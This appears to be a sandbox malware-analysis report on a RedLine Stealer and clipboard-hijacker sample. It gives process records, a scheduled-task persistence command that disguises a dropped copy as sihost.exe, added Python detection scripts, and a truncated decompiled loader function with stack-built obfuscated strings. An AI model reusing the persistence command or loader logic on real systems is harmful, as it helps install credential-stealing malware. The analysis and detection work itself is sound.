Path: C:\Users\user\Desktop\eYvT1lg5Dy.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\eYvT1lg5Dy.exe'
Imagebase: 0x400000
File size: 404648 bytes
MD5 hash: 355FBD5060B3BBAF8C5737B4279E9000
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.436050083.00000000049AC000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.349530777.0000000002E0D000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.441094022.0000000005E04000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.436773793.0000000004C50000.00000004.00020000.sdmp, Author: Joe Security
Reputation: low

General

Start time: 10:16:40
Start date: 25/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:17:19
Start date: 25/09/2021
Path: C:\Users\user\AppData\Local\Temp\filename.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\filename.exe'
Imagebase: 0x400000
File size: 293376 bytes
MD5 hash: D508B954A785BDB77FDEFFCD4C56F8E5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000B.00000003.432844510.0000000002C70000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 49%, ReversingLabs
Reputation: low

General

Start time: 10:17:22
Start date: 25/09/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
Imagebase: 0x380000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
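The schtasks.exe record above is the persistence step: a task with a vendor-updater style name (Azure-Update-Task) relaunches a binary every minute from a user-writable path, and that binary borrows the name of a Windows component (the real sihost.exe lives in %SystemRoot%\System32, not under AppData\Roaming). The sihost.exe record further down has the same MD5 as the dropped filename.exe, so it is the same clipboard hijacker copied to its persistence location. The Python below is an added example, not code from the report or from Joe Sandbox, that turns those three observations into checks a detection engineer could run over process-creation telemetry. The process list is transcribed from this report's System Behavior records; the watch-list of system binary names and the "every five minutes or faster" threshold are the example's own assumptions.

```python
"""Triage checks over sandbox process records (added example, not part of the
Joe Sandbox report): scheduled-task persistence into user-writable paths,
system-binary name masquerading, and one hash appearing under several paths."""
import re
from collections import defaultdict

# Transcribed from the report: (image path, command line as printed, MD5).
# The second, identical conhost.exe record is omitted.
PROCESSES = [
    (r"C:\Users\user\Desktop\eYvT1lg5Dy.exe",
     r"'C:\Users\user\Desktop\eYvT1lg5Dy.exe'",
     "355FBD5060B3BBAF8C5737B4279E9000"),
    (r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "EA777DEEA782E8B4D7C7C33BBF8A4496"),
    (r"C:\Users\user\AppData\Local\Temp\filename.exe",
     r"'C:\Users\user\AppData\Local\Temp\filename.exe'",
     "D508B954A785BDB77FDEFFCD4C56F8E5"),
    (r"C:\Windows\SysWOW64\schtasks.exe",
     r"/C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' "
     r"/tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'",
     "15FF7D8324231381BAD48A052F85DF04"),
    (r"C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe",
     r"C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe",
     "D508B954A785BDB77FDEFFCD4C56F8E5"),
]

# Assumption: a short watch-list of names that only ship under %SystemRoot%.
SYSTEM_BINARIES = {"sihost.exe", "svchost.exe", "conhost.exe", "dllhost.exe", "explorer.exe"}
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Users\\Public|Temp)\\", re.I)
WINDOWS_DIR = re.compile(r"^[a-z]:\\Windows\\", re.I)
# The report prints the original double quotes as single quotes; accept both.
QUOTED_OR_BARE = r"""'([^']*)'|"([^"]*)"|(\S+)"""
HIGH_FREQUENCY_MINUTES = 5  # assumption: /sc minute with /mo <= 5 is worth a finding


def _schtasks_opt(cmdline, name):
    """Value of a /name option, unquoted, or None if absent."""
    m = re.search(r"/%s\s+(?:%s)" % (name, QUOTED_OR_BARE), cmdline, re.I)
    return None if m is None else next(g for g in m.groups() if g is not None)


def parse_schtasks_create(cmdline):
    """Schedule, modifier, task name and action of a schtasks /create command
    line; None when the command line is not a /create."""
    if re.search(r"/create\b", cmdline, re.I) is None:
        return None
    mo = _schtasks_opt(cmdline, "mo")
    return {
        "schedule": (_schtasks_opt(cmdline, "sc") or "").lower(),
        "modifier": int(mo) if mo and mo.isdigit() else None,
        "task": _schtasks_opt(cmdline, "tn"),
        "action": _schtasks_opt(cmdline, "tr"),
    }


def is_masquerading(path):
    """A binary carrying a %SystemRoot% component's name but run from elsewhere."""
    name = path.rsplit("\\", 1)[-1].lower()
    return name in SYSTEM_BINARIES and WINDOWS_DIR.match(path) is None


def triage(processes):
    """Return (finding, details...) tuples in the order the records are seen,
    with the cross-record hash finding appended last."""
    findings, by_md5 = [], defaultdict(set)
    for path, cmdline, md5 in processes:
        by_md5[md5.upper()].add(path)
        if is_masquerading(path):
            findings.append(("masquerade", path))
        if path.lower().endswith("\\schtasks.exe"):
            task = parse_schtasks_create(cmdline)
            if task and task["action"] and USER_WRITABLE.search(task["action"]):
                findings.append(("persistence", task["task"], task["action"]))
            if task and task["schedule"] == "minute" and (task["modifier"] or 0) <= HIGH_FREQUENCY_MINUTES:
                findings.append(("high-frequency-task", task["task"], task["modifier"]))
    for md5, paths in by_md5.items():
        if len(paths) > 1:  # one file under two names: a dropped copy
            findings.append(("same-hash-multiple-paths", md5, tuple(sorted(paths))))
    return findings


if __name__ == "__main__":
    for finding in triage(PROCESSES):
        print(*finding)
```

Run against the transcribed records this yields four findings: the task action under AppData, the one-minute trigger, sihost.exe outside C:\Windows, and MD5 D508B954A785BDB77FDEFFCD4C56F8E5 under both the Temp and the Roaming path. On a live host the first check maps directly onto `Get-ScheduledTask` (inspect each task's `Actions.Execute` for user-writable paths) or `schtasks /query /v /fo csv`.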

General

Start time: 10:17:22
Start date: 25/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 10:17:25
Start date: 25/09/2021
Path: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe
Imagebase: 0x400000
File size: 293376 bytes
MD5 hash: D508B954A785BDB77FDEFFCD4C56F8E5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000E.00000003.448804837.0000000002C70000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000000E.00000002.609430439.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                        • Detection: 49%, ReversingLabs
                                                                                                                                                                                        Reputation:low

General

Start time: 10:17:30
Start date: 25/09/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe'
Imagebase: 0x380000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
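The schtasks invocation recorded above is the persistence mechanism: it registers a task that relaunches the dropped copy from %APPDATA% every minute, and the dropped file borrows the name of a legitimate Windows binary (sihost.exe, the Shell Infrastructure Host, which lives in System32) while sitting in a user-writable directory. The following detection logic is an added example, not part of the sandbox report; it runs over constructed process-creation events (the first reuses the command line shown above, the second is a made-up benign task for contrast). The five-minute threshold, the list of impersonated system binary names and the set of user-writable directories are assumptions chosen for the example.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample events as (image path, command line). The first command line
# is the one recorded in the report; the second is a constructed benign task.
SAMPLE_EVENTS = [
    ("C:\\Windows\\SysWOW64\\schtasks.exe",
     "/C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' "
     "/tr 'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Network\\sihost.exe'"),
    ("C:\\Windows\\System32\\schtasks.exe",
     '/create /sc daily /st 03:00 /tn "Backup" /tr "C:\\Program Files\\Backup\\backup.exe"'),
]

# Tokenizer that keeps quoted arguments (single or double quotes) intact.
TOKEN_RE = re.compile(r"'[^']*'|\"[^\"]*\"|\S+")
# Directories a standard user can write to (assumption: extend for your estate).
USER_WRITABLE_RE = re.compile(
    r"\\(AppData\\(Roaming|Local|LocalLow)|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)
SYSTEM_DIR_RE = re.compile(r"\\windows\\(system32|syswow64)\\", re.IGNORECASE)
# Names of Windows binaries commonly borrowed by droppers (assumption).
SYSTEM_BINARY_NAMES = {"sihost.exe", "svchost.exe", "explorer.exe", "dllhost.exe",
                       "conhost.exe", "runtimebroker.exe"}
HIGH_FREQUENCY_MINUTES = 5  # assumption: anything at or below this is worth a look


@dataclass
class Finding:
    task_name: Optional[str]
    target: Optional[str]
    schedule: Optional[str]
    modifier: Optional[int]
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_schtasks(cmdline: str) -> Dict[str, object]:
    """Pull the switches we care about out of a schtasks command line."""
    tokens = [t.strip("'\"") for t in TOKEN_RE.findall(cmdline)]
    args: Dict[str, object] = {}
    for i, tok in enumerate(tokens):
        key = tok.lower()
        if key in ("/sc", "/mo", "/tn", "/tr", "/st") and i + 1 < len(tokens):
            args[key] = tokens[i + 1]
    args["create"] = any(t.lower() == "/create" for t in tokens)
    return args


def masquerades_as_system_binary(path: str) -> bool:
    """True when the basename is a well-known Windows binary but the directory is not."""
    p = path.lower()
    name = p.rsplit("\\", 1)[-1]
    return name in SYSTEM_BINARY_NAMES and not SYSTEM_DIR_RE.search(p)


def assess(image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding for schtasks /create events, None for anything else."""
    if not image.lower().endswith("\\schtasks.exe"):
        return None
    args = parse_schtasks(cmdline)
    if not args["create"]:
        return None
    mo = str(args.get("/mo", ""))
    modifier = int(mo) if mo.isdigit() else None
    schedule = str(args.get("/sc", "")).lower() or None
    f = Finding(args.get("/tn"), args.get("/tr"), schedule, modifier)  # type: ignore[arg-type]
    # schtasks defaults /mo to 1 when /sc minute is given without a modifier.
    if schedule == "minute" and (modifier is None or modifier <= HIGH_FREQUENCY_MINUTES):
        f.reasons.append("high-frequency schedule (every %d minute(s))" % (modifier or 1))
    if f.target and USER_WRITABLE_RE.search(f.target):
        f.reasons.append("task target lives in a user-writable directory")
    if f.target and masquerades_as_system_binary(f.target):
        f.reasons.append("task target borrows the name of a Windows system binary")
    return f


def scan(events) -> List[Finding]:
    return [f for f in (assess(img, cl) for img, cl in events) if f and f.suspicious]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.task_name, "->", finding.target)
        for reason in finding.reasons:
            print("   ", reason)
```

Each reason on its own is weak (plenty of legitimate tasks run from ProgramData, and minute-granularity tasks exist), so the value is in the combination: a minute-interval task whose target sits in a profile directory under a system binary's name is the pattern this sample leaves behind.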

General

Start time: 10:17:31
Start date: 25/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis


Executed Functions

C-Code - Quality: 77%
E004019F0(void* __edx, void* __eflags) {
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    void* _t337;
    void* _t340;
    int _t341;
    CHAR* _t344;
    intOrPtr* _t349;
    int _t350;
    long _t352;
    signed int _t354;
    intOrPtr _t358;
    long _t359;
    CHAR* _t364;
    struct HINSTANCE__* _t365;
    CHAR* _t366;
    _Unknown_base(*)()* _t367;
    int _t368;
    int _t369;
    int _t370;
    intOrPtr* _t376;
    int _t378;
    intOrPtr _t379;
    intOrPtr* _t381;
    int _t383;
    intOrPtr* _t384;
    int _t385;
    int _t396;
    int _t399;
    int _t402;
    int _t405;
    intOrPtr* _t407;
    int _t413;
    int _t415;
    void* _t421;
    int _t422;
    int _t424;
    intOrPtr* _t428;
    intOrPtr _t429;
    intOrPtr* _t431;
    int _t432;
    int _t435;
    intOrPtr* _t437;
    int _t438;
    intOrPtr* _t439;
    int _t440;
    int _t442;
    signed int _t448;
    signed int _t451;
    signed int _t452;
    int _t469;
    int _t471;
    int _t482;
    signed int _t486;
    intOrPtr* _t488;
    intOrPtr* _t490;
    intOrPtr* _t492;
    intOrPtr _t493;
    void* _t494;
    struct HRSRC__* _t497;
    void* _t514;
    int _t519;
    intOrPtr* _t520;
    void* _t524;
    void* _t525;
    struct HINSTANCE__* _t526;
    intOrPtr _t527;
    void* _t531;
    void* _t535;
    struct HRSRC__* _t536;
    intOrPtr* _t537;
    intOrPtr* _t539;
    int _t542;
    int _t543;
    intOrPtr* _t547;
    intOrPtr* _t548;
    intOrPtr* _t549;
    intOrPtr* _t550;
    void* _t551;
    intOrPtr _t552;
    int _t555;
    void* _t556;
    void* _t557;
    void* _t558;
    void* _t559;
    void* _t560;
    void* _t561;
    void* _t562;
    intOrPtr* _t563;
    void* _t564;
    void* _t565;
    void* _t566;
    void* _t567;

    _t567 = __eflags;
    _t494 = __edx;
    __imp__OleInitialize(0); // executed
    // byte-wise stores filling a local stack buffer starting at _t556 + 0x18
     *((char*)(_t556 + 0x18)) = 0xe0;
     *((char*)(_t556 + 0x19)) = 0x3b;
     *((char*)(_t556 + 0x1a)) = 0x8d;
     *((char*)(_t556 + 0x1b)) = 0x2a;
     *((char*)(_t556 + 0x1c)) = 0xa2;
     *((char*)(_t556 + 0x1d)) = 0x2a;
     *((char*)(_t556 + 0x1e)) = 0x2a;
     *((char*)(_t556 + 0x1f)) = 0x41;
     *((char*)(_t556 + 0x20)) = 0xd3;
     *((char*)(_t556 + 0x21)) = 0x20;
     *((char*)(_t556 + 0x22)) = 0x64;
     *((char*)(_t556 + 0x23)) = 6;
     *((char*)(_t556 + 0x24)) = 0x8a;
     *((char*)(_t556 + 0x25)) = 0xf7;
     *((char*)(_t556 + 0x26)) = 0x3d;
     *((char*)(_t556 + 0x27)) = 0x9d;
     *((char*)(_t556 + 0x28)) = 0xd9;
     *((char*)(_t556 + 0x29)) = 0xee;
     *((char*)(_t556 + 0x2a)) = 0x15;
     *((char*)(_t556 + 0x2b)) = 0x68;
     *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                                                                                                                                          				 *((char*)(_t556 + 0x38)) = 0;
                                                                                                                                                                                          				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                                                                                                                                          				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                                                                                                                                          				_t557 = _t556 + 0xc;
                                                                                                                                                                                          				if(_t337 == 0x41b2a0) {
                                                                                                                                                                                          					L80:
                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                          					return 0;
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                                                                                          					_t525 = _t340;
                                                                                                                                                                                          					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x84)) = 0;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                                                                                                                                          					 *((char*)(_t557 + 0x38)) = 0;
                                                                                                                                                                                          					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                                                                                                                                          					if(_t341 == 0) {
                                                                                                                                                                                          						L38:
                                                                                                                                                                                          						FindCloseChangeNotification(_t525); // executed
                                                                                                                                                                                          						_t526 = GetModuleHandleA(0);
                                                                                                                                                                                          						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                                                                                                                                          						 *((char*)(_t557 + 0x3a)) = 0x6f;
 *((char*)(_t557 + 0x3b)) = 0xb4;
 *((char*)(_t557 + 0x3c)) = 0;
_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
_t558 = _t557 + 8;
_t536 = FindResourceA(_t526, _t344, 0xa);
 *(_t558 + 0x50) = _t536;
_t551 = LoadResource(_t526, _t536);
 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
_push(0x40022);
_t537 = _t349; // executed
_t350 = E0040AF66(0, _t526, __eflags); // executed
_t559 = _t558 + 8;
 *(_t559 + 0x34) = _t350;
__eflags = _t350;
if(_t350 == 0) {
	 *(_t559 + 0x50) = 0;
} else {
	E0040BA30(_t526, _t350, 0, 0x40022);
	_t486 =  *(_t559 + 0x40);
	_t559 = _t559 + 0xc;
	 *(_t559 + 0x50) = _t486;
}
E00401300( *(_t559 + 0x50));
_t497 =  *(_t559 + 0x48);
_t352 = SizeofResource(_t526, _t497);
 *(_t559 + 0x40) = _t352;
asm("cdq");
_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
__eflags = _t354;
if(_t354 > 0) {
	_t519 =  *(_t559 + 0x3c);
	_t482 = _t537 - _t519;
	__eflags = _t482;
	 *(_t559 + 0x34) = _t519;
	 *(_t559 + 0x88) = _t482;
	 *(_t559 + 0x38) = _t354;
	do {
		_t424 =  *(_t559 + 0x34);
		_push( *(_t559 + 0x88) + _t424);
		_push(0x400);
		_push(_t424);
		E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
		 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
		_t179 = _t559 + 0x38;
		 *_t179 =  *(_t559 + 0x38) - 1;
		__eflags =  *_t179;
	} while ( *_t179 != 0);
}
_t448 =  *(_t559 + 0x40) & 0x800003ff;
__eflags = _t448;
if(_t448 < 0) {
	_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
	__eflags = _t448;
}
__eflags = _t448;
if(_t448 > 0) {
	_t421 =  *(_t559 + 0x40) - _t448;
	_push(_t421 + _t537);
	_push(_t448);
	_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
	__eflags = _t422;
	_push(_t422);
	E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
}
E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
_t560 = _t559 + 0xc;
FreeResource(_t551);
_t552 =  *_t537;
 *((intOrPtr*)(_t560 + 0x94)) = _t552;
_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
_t561 = _t560 + 4;
 *((intOrPtr*)(_t561 + 0x40)) = _t358;
_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
_t527 =  *((intOrPtr*)(_t561 + 0x38));
_t192 = _t537 + 4; // 0x4
E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
_t528 = _t527 + 0xe;
 *((char*)(_t561 + 0x34)) = 0xce;
 *((char*)(_t561 + 0x35)) = 0x27;
 *((char*)(_t561 + 0x36)) = 0x9c;
 *((char*)(_t561 + 0x37)) = 0x1a;
 *((char*)(_t561 + 0x38)) = 0x95;
 *((char*)(_t561 + 0x39)) = 0x21;
 *((char*)(_t561 + 0x3a)) = 0x2e;
 *((char*)(_t561 + 0x3b)) = 0xd;
 *((char*)(_t561 + 0x3c)) = 0xdb;
